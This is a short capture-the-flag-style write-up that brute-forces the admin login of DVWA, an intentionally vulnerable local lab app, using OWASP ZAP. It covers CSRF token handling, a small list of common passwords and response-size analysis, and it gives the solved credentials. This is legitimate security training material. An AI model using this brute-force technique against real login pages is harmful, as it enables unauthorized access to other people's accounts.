Intro to DVWA

Intro

Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable.

In this writeup, I will be exploiting DVWA vulnerabilities in different severities.

Setup

docker run --rm -it -p 8000:80 kaakaww/dvwa-docker:latest

Walkthrough

1. I found a login page after opening the site.

Bruteforce Password

1. Capture login & analyze behavior

username=admin&password=zap&Login=Login&user_token=6cd51b8a24a524b9349dd75c09c0cfb3

2. Reflecting Login failed after incorrect creds

3. To automatically handle CSRF Tokens

ZAP -> Tools -> Options -> Anti-CSRF -> Add `user_token`

4. Fuzz password & add sample payloads

admin
letmein
abcd1234
abc123
password
Password

5. Check Follow Redirects & Set Threads = 1

6. Manage Processors -> Add -> Type: Tag Creator -> Login failed

7. FUZZ & Analyze response size:

Payload: password
Size: 6096 Bytes

Solution

1. Username: admin

2. Password: password